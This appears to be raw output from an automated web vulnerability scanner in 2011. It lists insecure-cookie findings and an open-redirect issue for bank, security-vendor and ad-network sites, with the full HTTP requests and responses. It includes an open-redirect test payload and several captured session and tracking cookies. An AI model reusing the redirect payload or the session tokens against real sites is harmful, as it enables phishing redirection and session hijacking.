The following cookie was issued by the application and does not have the secure flag set:
INTL_LANG=en_US
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/Search.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookie was issued by the application and does not have the secure flag set:
INTL_LANG=en_US
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/login.aspx?sgt=1 HTTP/1.1 Host: www.fs.ustrust.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url[] request parameter is used to perform an HTTP redirect. The payload http%3a//afa5caf6e671e492f/a%3fhttp%3a//servedby.flashtalking.com/click/16008%3b128708%3b94221%3b230%3b3/%3furl%3dhttp%3a//response.firstdata.com/%3felqPURLPage%3d15 was submitted in the url[] parameter. This caused a redirection to the following URL:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&fl=null&size=320x79 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ecommerce/categories/PCI-ASV-Scanning-Services/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hugthecloud.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:18:27 GMT Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe X-XN-XNHTML: false Date: Tue, 26 Apr 2011 12:39:16 GMT Date: Tue, 26 Apr 2011 12:39:16 GMT Vary: X-XN_APPLICATION P3P: CP="UNI STA LOC CURa OURa COR ALL IND" Expires: Thu, 01 Jan 1970 00:00:00 GMT Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC CACHE-CONTROL: max-age=0 CACHE-CONTROL: no-cache="Set-Cookie" Content-Type: text/html; charset=utf-8 Server: Ning HTTP Server 2.0 Content-Length: 54058
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.hugthecloud.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: xn_visitor=367ebb41-9a4a-4792-a848-e329e8f51d58; ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFBsMRGdDlgSH6V+jaPEOm0Y=; 2__utmz=^ning.1319591918512:85044224.1303823919.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmv=^ning.1303823918511:; 2__utma=^ning.1366895918512:85044224.1282109851.1303823919.1303823919.1303823919.1; 2__utmc=^ning.1366895918512:85044224; 2__utmb=^ning.1303825718512:85044224.1.10.1303823919; xn_track=rp%252C%25252F%252Crc%252C0%252Csi%252C1303823924%252Cse%252C1303824824
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:18:42 GMT Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFGef0Np4Of2wCuLXfA8BPNs=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:42 GMT X-XN-Trace-Token: 1e53f0bd-ed7d-431f-993e-ef218725020a ETag: "db9c1-483-45a88f5754cc0" Date: Tue, 26 Apr 2011 12:36:52 GMT Date: Tue, 26 Apr 2011 12:36:52 GMT Vary: X-XN_APPLICATION P3P: CP="UNI STA LOC CURa OURa COR ALL IND" Expires: Thu, 01 Jan 1970 00:00:00 GMT Last-Modified: Fri, 31 Oct 2008 09:09:47 GMT CACHE-CONTROL: max-age=0 CACHE-CONTROL: no-cache="Set-Cookie" Content-Type: image/x-icon Accept-Ranges: bytes Server: Ning HTTP Server 2.0 Content-Length: 1155
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
SESSa3ee040a33364f343ddaa1d4cf0e6bab=2q12tlg89jgpaked26837s8347; expires=Thu, 19 May 2011 03:18:39 GMT; path=/; domain=.m8security.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.m8security.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15 HTTP/1.1 Host: 109.xg4ken.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 23:44:03 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=2c557654-692b-10a8-2a58-00004d95d016; expires=Sun, 24-Jul-2011 23:44:03 GMT; path=/; domain=.xg4ken.com Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 3896 Date: Tue, 26 Apr 2011 14:21:07 GMT
_289667_amg_acamp_id=166308; _289667_amg_pcamp_id=69114; _289667_amg_location_id=55367; _289667_amg_creative_id=289667; _289667_amg_loaded=true; var _amg_289667_content='<script type="text/javascript" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=7&c2=8097938&rn=1114821727&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.tenable.com%252Fservices%252Fnessus-perimeter-service%253Fgclid%253DCNLb8cPsuKgCFQbe4AodEirYCA%26jsref%3D%26rnd%3D1303775074503&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Mon, 25 Apr 2011 23:45:19 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 23:45:19 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=69114&c5=166308&c6=&cv=1.3&cj=1&rn=1263260761 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 14:21:10 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 14:21:10 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/p.json?rb=0&gen=1000&gen=100&sid=4db6076013a27c7a&callback=_ate.ad.hrr&pub=xa-4ca0241930358767&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fresources%2Fwebinars%2Fe-commerce%2Fpci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg&9vmo63 HTTP/1.1 Host: cf.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=3; uid=4dab4fa85facd099; uit=1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dsatserving2/servlet/BannerServer?tagid=1139&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&adh=40&adw=590 HTTP/1.1 Host: contextlinks.netseer.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fe0b24b3b7c7dd3,1303674392792,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862,11:EXTERNAL:1303614599357"
